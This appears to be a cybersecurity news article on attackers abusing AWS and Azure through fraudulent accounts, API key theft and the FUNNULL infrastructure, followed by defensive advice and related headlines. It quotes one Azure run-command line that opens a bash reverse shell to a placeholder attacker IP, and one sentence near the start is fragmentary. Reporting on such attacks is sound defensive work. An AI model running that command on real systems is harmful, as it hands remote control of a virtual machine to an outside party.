Hackers are increasingly leveraging cloud platforms like Amazon Web Services (AWS) and Microsoft Azure to orchestrate large-scale cyber attacks.
These platforms, which host critical infrastructure for businesses worldwide, are being exploited through sophisticated methods, including fraudulent account setups, API key theft, and infrastructure laundering.
The mechanics of the exploitation:-
RunShellScript
command or AWS’s public AMIs (Amazon Machine Images), attackers gain remote access to virtual machines (VMs) and extract sensitive metadata or credentials. For example: az vm run-command invoke -g <GROUP-NAME> -n <VM-NAME> --command-id RunShellScript --scripts "bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/9090 0>&1'"
Silent Push researchers discovered that this command grants a reverse shell on a Linux VM hosted on Azure.
FUNNULL’s infrastructure is linked to phishing campaigns involving over 200,000 malicious hostnames generated via Domain Generation Algorithms, targeting major brands like Microsoft and Google.
In addition, attackers utilize compromised environments to exfiltrate sensitive data before erasing it and demanding ransom payments, a tactic recently seen in AWS breaches affecting over 230 million cloud environments.
Moreover, FUNNULL has engaged in supply chain attacks, notably hijacking a popular JavaScript library to infect over 110,000 websites.
To counter these threats, organizations must adopt robust cloud security measures. This includes deploying enhanced monitoring tools like GuardDuty for AWS or Microsoft Defender for Cloud to detect suspicious activities in real time.
Additionally, API security can be strengthened by regularly rotating API keys and restricting their usage based on IP or time constraints.
Regular configuration audits of cloud resources help identify misconfigurations, and implementing a Zero Trust Architecture with multi-factor authentication (MFA) and least privilege access policies further safeguards the environment.
Both AWS and Microsoft have acknowledged the challenges posed by these attacks. By addressing these vulnerabilities head-on, businesses can fortify their defenses against the misuse of cloud platforms for cybercrime.
Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Start Now for Free.
Cary, NC, March 24th, 2025, CyberNewsWire INE Security, a global provider of cybersecurity training and…
A sophisticated phishing campaign targeting Google account credentials through fake Semrush advertisements has emerged, posing…
A highly targeted phishing campaign is currently exploiting Pocket Card users through elaborately crafted emails…
INTERPOL led a multi-national law enforcement operation dubbed "Operation Red Card," which has resulted in…
A novel attack vector combining browser cache exploitation and DLL proxying has emerged as a…
A groundbreaking security tool has emerged in the ongoing battle against sophisticated Linux malware. A…